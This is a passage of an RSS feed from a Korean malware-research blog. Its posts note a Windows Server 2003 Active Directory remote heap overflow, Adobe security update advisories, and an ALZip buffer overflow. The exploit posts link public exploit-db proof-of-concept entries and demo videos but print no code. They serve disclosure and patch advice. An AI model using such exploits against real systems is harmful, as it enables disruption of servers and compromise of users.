			&lt;li class=&quot;tt-sns-service-other&quot;&gt;&lt;a href=&quot;javascript:;&quot; onmouseover=&quot;ShareEntryWithSNS.showLayer(event, '');&quot; onmouseout=&quot;ShareEntryWithSNS.hideLayer(event, '');&quot;&gt;더보기&lt;/a&gt;&lt;/li&gt;
		&lt;/ul&gt;
		&lt;ul class=&quot;tt-sns-service-more&quot; id=&quot;ttSnsServiceMore-&quot; onmouseout=&quot;ShareEntryWithSNS.hideLayer(event, '');&quot;&gt;
			&lt;li class=&quot;tt-sns-service-me2day&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('me2day', '', '');&quot;&gt;미투데이&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-yozm&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('yozm', '', '');&quot;&gt;요즘&lt;/a&gt;&lt;/li&gt;
		&lt;/ul&gt;
	&lt;/div&gt;
	&lt;div class=&quot;tt-sns-clear&quot;&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align:left; padding-top:10px;&quot;&gt;
&lt;iframe src=&quot;http://www.facebook.com/plugins/like.php?href=malwarelab.tistory.com/131&amp;amp;layout=standard&amp;amp;show_faces=true&amp;amp;width=310&amp;amp;action=like&amp;amp;font=tahoma&amp;amp;colorscheme=light&amp;amp;height=65&quot; scrolling=&quot;no&quot; frameborder=&quot;0&quot; style=&quot;border:none; overflow:hidden; width:310px; height:65px;&quot; allowTransparency=&quot;true&quot;&gt;&lt;/iframe&gt;
&lt;/div&gt;
&lt;fieldset style=&quot;margin:20px 0px 20px 0px;padding:5px;&quot;&gt;&lt;legend&gt;&lt;span&gt;&lt;strong&gt;크리에이티브 커먼즈 라이선스&lt;/strong&gt;&lt;/span&gt;&lt;/legend&gt;&lt;!--Creative Commons License--&gt;&lt;div style=&quot;float: left; width: 88px; margin-top: 3px;&quot;&gt;&lt;a rel=&quot;license&quot; href=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; target=&quot;_blank&quot;&gt;&lt;img alt=&quot;Creative Commons License&quot; style=&quot;border-width: 0&quot; src=&quot;http://i.creativecommons.org/l/by-nc-nd/2.0/kr/88x31.png&quot;/&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;margin-left: 92px; margin-top: 3px; text-align: justify;&quot;&gt;이 저작물은 &lt;a rel=&quot;license&quot; href=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; target=&quot;_blank&quot;&gt;크리에이티브 커먼즈 코리아 저작자표시-비영리-변경금지 2.0 대한민국 라이선스&lt;/a&gt;에 따라 이용하실 수 있습니다.
			&lt;!-- Creative Commons License--&gt;
			&lt;!-- &lt;rdf:RDF xmlns=&quot;http://web.resource.org/cc/&quot; xmlns:dc=&quot;http://purl.org/dc/elements/1.1/&quot; xmlns:rdf=&quot;http://www.w3.org/1999/02/22-rdf-syntax-ns#&quot;&gt;
			&lt;Work rdf:about=&quot;&quot;&gt;
			&lt;license rdf:resource=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; /&gt;
			&lt;/Work&gt;
			&lt;License rdf:about=&quot;http://creativecommons.org/licenses/by-nc-nd/&quot;&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Reproduction&quot;/&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Distribution&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Notice&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Attribution&quot;/&gt;&lt;prohibits rdf:resource=&quot;http://web.resource.org/cc/CommercialUse&quot;/&gt;&lt;/License&gt;&lt;/rdf:RDF&gt; --&gt;&lt;/div&gt;&lt;/fieldset&gt;</description>
			<category>0x04 reference&amp;tools</category>
			<category>3.4ddos</category>
			<category>DDos</category>
			<category>악성코드</category>
			<author>demantos</author>
			<guid>http://malwarelab.tistory.com/131</guid>
			<comments>http://malwarelab.tistory.com/entry/34-DDoS-%EA%B3%B5%EA%B2%A9%EC%97%90-%EC%82%AC%EC%9A%A9%EB%90%9C-%EC%95%85%EC%84%B1%EC%BD%94%EB%93%9C%EA%B0%84%EC%9D%98-%EA%B4%80%EA%B3%84%EB%8F%84#entry131comment</comments>
			<pubDate>Mon, 07 Mar 2011 17:10:00 +0900</pubDate>
		</item>
		<item>
			<title>MS Windows Server 2003 AD Pre-Auth BROWSER ELECTION Remote Heap Overflow</title>
			<link>http://malwarelab.tistory.com/entry/MS-Windows-Server-2003-AD-Pre-Auth-BROWSER-ELECTION-Remote-Heap-Overflow</link>
			<description>&lt;P&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
지난주에 Windows Server 2003 Active Directory에서 제로데이 취약점이 발견되었고 exploit이 공개되었습니다.&lt;br /&gt;
&lt;br /&gt;&lt;A href=&quot;http://www.exploit-db.com/exploits/16166/&quot;&gt;http://www.exploit-db.com/exploits/16166/&lt;/A&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
위 코드 실행시 타겟 서버는 블루스크린(Blue Screen of Death)이 뜨게됩니다.&lt;br /&gt;
&lt;br /&gt;metasploit에도 exploit이 공개되었는데 잘 안되더군요..&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;테스트한 대상시스템은 단순히 AD만 설치한 상태입니다.&lt;br /&gt;
&lt;br /&gt;&lt;object width=&quot;600&quot; height=&quot;400&quot;&gt;&lt;param name=&quot;movie&quot; value=&quot;http://www.youtube.com/v/4OTEySDClJ8?hl=ko&amp;amp;fs=1&quot;&gt;&lt;/param&gt;&lt;param name=&quot;allowFullScreen&quot; value=&quot;true&quot;&gt;&lt;/param&gt;&lt;param name=&quot;allowscriptaccess&quot; value=&quot;always&quot;&gt;&lt;/param&gt;&lt;embed src=&quot;http://www.youtube.com/v/4OTEySDClJ8?hl=ko&amp;amp;fs=1&quot; type=&quot;application/x-shockwave-flash&quot; allowscriptaccess=&quot;always&quot; allowfullscreen=&quot;true&quot; width=&quot;600&quot; height=&quot;400&quot;&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;
&lt;br /&gt;&lt;/P&gt;&lt;div class=&quot;entry-ccl&quot; style=&quot;clear: both; text-align: right; margin-bottom: 10px&quot;&gt;
	&lt;img id=&quot;ccl-icon-130-0&quot; class=&quot;entry-ccl-by&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black01.png&quot; alt=&quot;저작자 표시&quot;/&gt;
	&lt;img id=&quot;ccl-icon-130-1&quot; class=&quot;entry-ccl-nc&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black02.png&quot; alt=&quot;비영리&quot;/&gt;
	&lt;img id=&quot;ccl-icon-130-2&quot; class=&quot;entry-ccl-nd&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black03.png&quot; alt=&quot;변경 금지&quot;/&gt;
	&lt;!--
	&lt;rdf:RDF xmlns=&quot;http://web.resource.org/cc/&quot; xmlns:dc=&quot;http://purl.org/dc/elements/1.1/&quot; xmlns:rdf=&quot;http://www.w3.org/1999/02/22-rdf-syntax-ns#&quot;&gt;
		&lt;Work rdf:about=&quot;&quot;&gt;
			&lt;license rdf:resource=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; /&gt;
		&lt;/Work&gt;
		&lt;License rdf:about=&quot;http://creativecommons.org/licenses/by-nc-nd/&quot;&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Reproduction&quot;/&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Distribution&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Notice&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Attribution&quot;/&gt;
			&lt;prohibits rdf:resource=&quot;http://web.resource.org/cc/CommercialUse&quot;/&gt;
		&lt;/License&gt;
	&lt;/rdf:RDF&gt;
	--&gt;
&lt;/div&gt;
&lt;div class=&quot;tt-plugin tt-share-entry-with-sns tt-sns-icon-alignment-right tt-sns-icon-size-big&quot;&gt;
	&lt;div class=&quot;tt-sns-wrap&quot; id=&quot;ttSnsWrap-&quot;&gt;
		&lt;ul class=&quot;tt-sns-service-default&quot;&gt;
			&lt;li class=&quot;tt-sns-service-mypeople&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('mypeople', '', '');&quot;&gt;마이피플&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-twitter&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('twitter', '', '');&quot;&gt;트위터&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-facebook&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('facebook', '', '');&quot;&gt;페이스북&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-other&quot;&gt;&lt;a href=&quot;javascript:;&quot; onmouseover=&quot;ShareEntryWithSNS.showLayer(event, '');&quot; onmouseout=&quot;ShareEntryWithSNS.hideLayer(event, '');&quot;&gt;더보기&lt;/a&gt;&lt;/li&gt;
		&lt;/ul&gt;
		&lt;ul class=&quot;tt-sns-service-more&quot; id=&quot;ttSnsServiceMore-&quot; onmouseout=&quot;ShareEntryWithSNS.hideLayer(event, '');&quot;&gt;
			&lt;li class=&quot;tt-sns-service-me2day&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('me2day', '', '');&quot;&gt;미투데이&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-yozm&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('yozm', '', '');&quot;&gt;요즘&lt;/a&gt;&lt;/li&gt;
		&lt;/ul&gt;
	&lt;/div&gt;
	&lt;div class=&quot;tt-sns-clear&quot;&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align:left; padding-top:10px;&quot;&gt;
&lt;iframe src=&quot;http://www.facebook.com/plugins/like.php?href=malwarelab.tistory.com/130&amp;amp;layout=standard&amp;amp;show_faces=true&amp;amp;width=310&amp;amp;action=like&amp;amp;font=tahoma&amp;amp;colorscheme=light&amp;amp;height=65&quot; scrolling=&quot;no&quot; frameborder=&quot;0&quot; style=&quot;border:none; overflow:hidden; width:310px; height:65px;&quot; allowTransparency=&quot;true&quot;&gt;&lt;/iframe&gt;
&lt;/div&gt;
&lt;fieldset style=&quot;margin:20px 0px 20px 0px;padding:5px;&quot;&gt;&lt;legend&gt;&lt;span&gt;&lt;strong&gt;크리에이티브 커먼즈 라이선스&lt;/strong&gt;&lt;/span&gt;&lt;/legend&gt;&lt;!--Creative Commons License--&gt;&lt;div style=&quot;float: left; width: 88px; margin-top: 3px;&quot;&gt;&lt;a rel=&quot;license&quot; href=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; target=&quot;_blank&quot;&gt;&lt;img alt=&quot;Creative Commons License&quot; style=&quot;border-width: 0&quot; src=&quot;http://i.creativecommons.org/l/by-nc-nd/2.0/kr/88x31.png&quot;/&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;margin-left: 92px; margin-top: 3px; text-align: justify;&quot;&gt;이 저작물은 &lt;a rel=&quot;license&quot; href=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; target=&quot;_blank&quot;&gt;크리에이티브 커먼즈 코리아 저작자표시-비영리-변경금지 2.0 대한민국 라이선스&lt;/a&gt;에 따라 이용하실 수 있습니다.
			&lt;!-- Creative Commons License--&gt;
			&lt;!-- &lt;rdf:RDF xmlns=&quot;http://web.resource.org/cc/&quot; xmlns:dc=&quot;http://purl.org/dc/elements/1.1/&quot; xmlns:rdf=&quot;http://www.w3.org/1999/02/22-rdf-syntax-ns#&quot;&gt;
			&lt;Work rdf:about=&quot;&quot;&gt;
			&lt;license rdf:resource=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; /&gt;
			&lt;/Work&gt;
			&lt;License rdf:about=&quot;http://creativecommons.org/licenses/by-nc-nd/&quot;&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Reproduction&quot;/&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Distribution&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Notice&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Attribution&quot;/&gt;&lt;prohibits rdf:resource=&quot;http://web.resource.org/cc/CommercialUse&quot;/&gt;&lt;/License&gt;&lt;/rdf:RDF&gt; --&gt;&lt;/div&gt;&lt;/fieldset&gt;</description>
			<category>0x06 vulnerability</category>
			<category>Browser Election Remote Heap Overflow</category>
			<category>CVE-2011-0654</category>
			<category>windows server 2003 AD</category>
			<category>블루스크린</category>
			<author>demantos</author>
			<guid>http://malwarelab.tistory.com/130</guid>
			<comments>http://malwarelab.tistory.com/entry/MS-Windows-Server-2003-AD-Pre-Auth-BROWSER-ELECTION-Remote-Heap-Overflow#entry130comment</comments>
			<pubDate>Mon, 21 Feb 2011 15:50:57 +0900</pubDate>
		</item>
		<item>
			<title>Adobe Flash Player, Reader/Acrobat, Shockwave Player 다중 취약점 보안 업데이트 권고</title>
			<link>http://malwarelab.tistory.com/entry/Adobe-Flash-Player-ReaderAcrobat-Shockwave-Player-%EB%8B%A4%EC%A4%91-%EC%B7%A8%EC%95%BD%EC%A0%90-%EB%B3%B4%EC%95%88-%EC%97%85%EB%8D%B0%EC%9D%B4%ED%8A%B8-%EA%B6%8C%EA%B3%A0</link>
			<description>&lt;P&gt;&lt;br /&gt;
&lt;br /&gt;Adobe Flash Player 다중 취약점 보안 업데이트 권고&lt;br /&gt;
&lt;A href=&quot;http://www.krcert.or.kr/secureNoticeView.do?num=499&amp;amp;seq=-1&quot;&gt;http://www.krcert.or.kr/secureNoticeView.do?num=499&amp;amp;seq=-1&lt;/A&gt;&lt;/P&gt;
&lt;P&gt;&lt;br /&gt;
Adobe Reader/Acrobat 다중 취약점 보안업데이트 권고 &lt;br /&gt;
&lt;A href=&quot;http://www.krcert.or.kr/secureNoticeView.do?num=500&amp;amp;seq=-1&quot;&gt;http://www.krcert.or.kr/secureNoticeView.do?num=500&amp;amp;seq=-1&lt;/A&gt;&lt;/P&gt;
&lt;P&gt;&lt;br /&gt;
Adobe Shockwave Player 다중 취약점 보안업데이트 권고 &lt;br /&gt;
&lt;A href=&quot;http://www.krcert.or.kr/secureNoticeView.do?num=501&amp;amp;seq=-1&quot;&gt;http://www.krcert.or.kr/secureNoticeView.do?num=501&amp;amp;seq=-1&lt;/A&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
임의의 코드 실행이 가능한 취약점이 많기 때문에 필히 업데이트하시는게 좋을 듯 합니다.&lt;br /&gt;
&lt;br /&gt;성의없는 포스팅 읽어주셔서 감사합니다. ㅜ.ㅜ&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;&lt;/P&gt;&lt;div class=&quot;entry-ccl&quot; style=&quot;clear: both; text-align: right; margin-bottom: 10px&quot;&gt;
	&lt;img id=&quot;ccl-icon-129-0&quot; class=&quot;entry-ccl-by&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black01.png&quot; alt=&quot;저작자 표시&quot;/&gt;
	&lt;img id=&quot;ccl-icon-129-1&quot; class=&quot;entry-ccl-nc&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black02.png&quot; alt=&quot;비영리&quot;/&gt;
	&lt;img id=&quot;ccl-icon-129-2&quot; class=&quot;entry-ccl-nd&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black03.png&quot; alt=&quot;변경 금지&quot;/&gt;
	&lt;!--
	&lt;rdf:RDF xmlns=&quot;http://web.resource.org/cc/&quot; xmlns:dc=&quot;http://purl.org/dc/elements/1.1/&quot; xmlns:rdf=&quot;http://www.w3.org/1999/02/22-rdf-syntax-ns#&quot;&gt;
		&lt;Work rdf:about=&quot;&quot;&gt;
			&lt;license rdf:resource=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; /&gt;
		&lt;/Work&gt;
		&lt;License rdf:about=&quot;http://creativecommons.org/licenses/by-nc-nd/&quot;&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Reproduction&quot;/&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Distribution&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Notice&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Attribution&quot;/&gt;
			&lt;prohibits rdf:resource=&quot;http://web.resource.org/cc/CommercialUse&quot;/&gt;
		&lt;/License&gt;
	&lt;/rdf:RDF&gt;
	--&gt;
&lt;/div&gt;
&lt;div class=&quot;tt-plugin tt-share-entry-with-sns tt-sns-icon-alignment-right tt-sns-icon-size-big&quot;&gt;
	&lt;div class=&quot;tt-sns-wrap&quot; id=&quot;ttSnsWrap-&quot;&gt;
		&lt;ul class=&quot;tt-sns-service-default&quot;&gt;
			&lt;li class=&quot;tt-sns-service-mypeople&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('mypeople', '', '');&quot;&gt;마이피플&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-twitter&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('twitter', '', '');&quot;&gt;트위터&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-facebook&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('facebook', '', '');&quot;&gt;페이스북&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-other&quot;&gt;&lt;a href=&quot;javascript:;&quot; onmouseover=&quot;ShareEntryWithSNS.showLayer(event, '');&quot; onmouseout=&quot;ShareEntryWithSNS.hideLayer(event, '');&quot;&gt;더보기&lt;/a&gt;&lt;/li&gt;
		&lt;/ul&gt;
		&lt;ul class=&quot;tt-sns-service-more&quot; id=&quot;ttSnsServiceMore-&quot; onmouseout=&quot;ShareEntryWithSNS.hideLayer(event, '');&quot;&gt;
			&lt;li class=&quot;tt-sns-service-me2day&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('me2day', '', '');&quot;&gt;미투데이&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-yozm&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('yozm', '', '');&quot;&gt;요즘&lt;/a&gt;&lt;/li&gt;
		&lt;/ul&gt;
	&lt;/div&gt;
	&lt;div class=&quot;tt-sns-clear&quot;&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align:left; padding-top:10px;&quot;&gt;
&lt;iframe src=&quot;http://www.facebook.com/plugins/like.php?href=malwarelab.tistory.com/129&amp;amp;layout=standard&amp;amp;show_faces=true&amp;amp;width=310&amp;amp;action=like&amp;amp;font=tahoma&amp;amp;colorscheme=light&amp;amp;height=65&quot; scrolling=&quot;no&quot; frameborder=&quot;0&quot; style=&quot;border:none; overflow:hidden; width:310px; height:65px;&quot; allowTransparency=&quot;true&quot;&gt;&lt;/iframe&gt;
&lt;/div&gt;
&lt;fieldset style=&quot;margin:20px 0px 20px 0px;padding:5px;&quot;&gt;&lt;legend&gt;&lt;span&gt;&lt;strong&gt;크리에이티브 커먼즈 라이선스&lt;/strong&gt;&lt;/span&gt;&lt;/legend&gt;&lt;!--Creative Commons License--&gt;&lt;div style=&quot;float: left; width: 88px; margin-top: 3px;&quot;&gt;&lt;a rel=&quot;license&quot; href=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; target=&quot;_blank&quot;&gt;&lt;img alt=&quot;Creative Commons License&quot; style=&quot;border-width: 0&quot; src=&quot;http://i.creativecommons.org/l/by-nc-nd/2.0/kr/88x31.png&quot;/&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;margin-left: 92px; margin-top: 3px; text-align: justify;&quot;&gt;이 저작물은 &lt;a rel=&quot;license&quot; href=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; target=&quot;_blank&quot;&gt;크리에이티브 커먼즈 코리아 저작자표시-비영리-변경금지 2.0 대한민국 라이선스&lt;/a&gt;에 따라 이용하실 수 있습니다.
			&lt;!-- Creative Commons License--&gt;
			&lt;!-- &lt;rdf:RDF xmlns=&quot;http://web.resource.org/cc/&quot; xmlns:dc=&quot;http://purl.org/dc/elements/1.1/&quot; xmlns:rdf=&quot;http://www.w3.org/1999/02/22-rdf-syntax-ns#&quot;&gt;
			&lt;Work rdf:about=&quot;&quot;&gt;
			&lt;license rdf:resource=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; /&gt;
			&lt;/Work&gt;
			&lt;License rdf:about=&quot;http://creativecommons.org/licenses/by-nc-nd/&quot;&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Reproduction&quot;/&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Distribution&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Notice&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Attribution&quot;/&gt;&lt;prohibits rdf:resource=&quot;http://web.resource.org/cc/CommercialUse&quot;/&gt;&lt;/License&gt;&lt;/rdf:RDF&gt; --&gt;&lt;/div&gt;&lt;/fieldset&gt;</description>
			<category>0x06 vulnerability</category>
			<category>Acrobat</category>
			<category>Adobe Reader</category>
			<category>adobe 업데이트</category>
			<category>Flash Player</category>
			<category>Shockwave Player</category>
			<author>demantos</author>
			<guid>http://malwarelab.tistory.com/129</guid>
			<comments>http://malwarelab.tistory.com/entry/Adobe-Flash-Player-ReaderAcrobat-Shockwave-Player-%EB%8B%A4%EC%A4%91-%EC%B7%A8%EC%95%BD%EC%A0%90-%EB%B3%B4%EC%95%88-%EC%97%85%EB%8D%B0%EC%9D%B4%ED%8A%B8-%EA%B6%8C%EA%B3%A0#entry129comment</comments>
			<pubDate>Thu, 10 Feb 2011 10:56:59 +0900</pubDate>
		</item>
		<item>
			<title>ALZip 8.12.0.3 Buffer Overflow (SEH)</title>
			<link>http://malwarelab.tistory.com/entry/ALZip-81203-Buffer-Overflow-SEH</link>
			<description>&lt;br /&gt;
&lt;br /&gt;exploit-db에 PoC 코드가 공개되었습니다.&lt;br /&gt;
&lt;br /&gt;&lt;A href=&quot;http://www.exploit-db.com/exploits/16015/&quot;&gt;http://www.exploit-db.com/exploits/16015/&lt;/A&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
알툴즈 사이트에 가셔서 ALZip 8.2로 업데이트하시기 바랍니다.&lt;br /&gt;
&lt;br /&gt;&lt;A href=&quot;http://www.altools.co.kr/Download/ALZip.aspx&quot;&gt;http://www.altools.co.kr/Download/ALZip.aspx&lt;/A&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;&lt;STRONG&gt;PoC 시연 동영상&lt;br /&gt;
&lt;/STRONG&gt;&lt;br /&gt;
&lt;IFRAME class=youtube-player title=&quot;YouTube video player&quot; height=390 src=&quot;http://www.youtube.com/embed/PTV_tZinI6w&quot; frameBorder=0 width=640 type=&quot;text/html&quot; allowFullScreen&gt;&lt;/IFRAME&gt;&lt;div class=&quot;entry-ccl&quot; style=&quot;clear: both; text-align: right; margin-bottom: 10px&quot;&gt;
	&lt;img id=&quot;ccl-icon-128-0&quot; class=&quot;entry-ccl-by&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black01.png&quot; alt=&quot;저작자 표시&quot;/&gt;
	&lt;img id=&quot;ccl-icon-128-1&quot; class=&quot;entry-ccl-nc&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black02.png&quot; alt=&quot;비영리&quot;/&gt;
	&lt;img id=&quot;ccl-icon-128-2&quot; class=&quot;entry-ccl-nd&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black03.png&quot; alt=&quot;변경 금지&quot;/&gt;
	&lt;!--
	&lt;rdf:RDF xmlns=&quot;http://web.resource.org/cc/&quot; xmlns:dc=&quot;http://purl.org/dc/elements/1.1/&quot; xmlns:rdf=&quot;http://www.w3.org/1999/02/22-rdf-syntax-ns#&quot;&gt;
		&lt;Work rdf:about=&quot;&quot;&gt;
			&lt;license rdf:resource=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; /&gt;
		&lt;/Work&gt;
		&lt;License rdf:about=&quot;http://creativecommons.org/licenses/by-nc-nd/&quot;&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Reproduction&quot;/&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Distribution&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Notice&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Attribution&quot;/&gt;
			&lt;prohibits rdf:resource=&quot;http://web.resource.org/cc/CommercialUse&quot;/&gt;
		&lt;/License&gt;
	&lt;/rdf:RDF&gt;
	--&gt;
&lt;/div&gt;
&lt;div class=&quot;tt-plugin tt-share-entry-with-sns tt-sns-icon-alignment-right tt-sns-icon-size-big&quot;&gt;
	&lt;div class=&quot;tt-sns-wrap&quot; id=&quot;ttSnsWrap-&quot;&gt;
		&lt;ul class=&quot;tt-sns-service-default&quot;&gt;
			&lt;li class=&quot;tt-sns-service-mypeople&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('mypeople', '', '');&quot;&gt;마이피플&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-twitter&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('twitter', '', '');&quot;&gt;트위터&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-facebook&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('facebook', '', '');&quot;&gt;페이스북&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-other&quot;&gt;&lt;a href=&quot;javascript:;&quot; onmouseover=&quot;ShareEntryWithSNS.showLayer(event, '');&quot; onmouseout=&quot;ShareEntryWithSNS.hideLayer(event, '');&quot;&gt;더보기&lt;/a&gt;&lt;/li&gt;
		&lt;/ul&gt;
		&lt;ul class=&quot;tt-sns-service-more&quot; id=&quot;ttSnsServiceMore-&quot; onmouseout=&quot;ShareEntryWithSNS.hideLayer(event, '');&quot;&gt;
			&lt;li class=&quot;tt-sns-service-me2day&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('me2day', '', '');&quot;&gt;미투데이&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-yozm&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('yozm', '', '');&quot;&gt;요즘&lt;/a&gt;&lt;/li&gt;
		&lt;/ul&gt;
	&lt;/div&gt;
	&lt;div class=&quot;tt-sns-clear&quot;&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align:left; padding-top:10px;&quot;&gt;
&lt;iframe src=&quot;http://www.facebook.com/plugins/like.php?href=malwarelab.tistory.com/128&amp;amp;layout=standard&amp;amp;show_faces=true&amp;amp;width=310&amp;amp;action=like&amp;amp;font=tahoma&amp;amp;colorscheme=light&amp;amp;height=65&quot; scrolling=&quot;no&quot; frameborder=&quot;0&quot; style=&quot;border:none; overflow:hidden; width:310px; height:65px;&quot; allowTransparency=&quot;true&quot;&gt;&lt;/iframe&gt;
&lt;/div&gt;
&lt;fieldset style=&quot;margin:20px 0px 20px 0px;padding:5px;&quot;&gt;&lt;legend&gt;&lt;span&gt;&lt;strong&gt;크리에이티브 커먼즈 라이선스&lt;/strong&gt;&lt;/span&gt;&lt;/legend&gt;&lt;!--Creative Commons License--&gt;&lt;div style=&quot;float: left; width: 88px; margin-top: 3px;&quot;&gt;&lt;a rel=&quot;license&quot; href=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; target=&quot;_blank&quot;&gt;&lt;img alt=&quot;Creative Commons License&quot; style=&quot;border-width: 0&quot; src=&quot;http://i.creativecommons.org/l/by-nc-nd/2.0/kr/88x31.png&quot;/&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;margin-left: 92px; margin-top: 3px; text-align: justify;&quot;&gt;이 저작물은 &lt;a rel=&quot;license&quot; href=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; target=&quot;_blank&quot;&gt;크리에이티브 커먼즈 코리아 저작자표시-비영리-변경금지 2.0 대한민국 라이선스&lt;/a&gt;에 따라 이용하실 수 있습니다.
			&lt;!-- Creative Commons License--&gt;
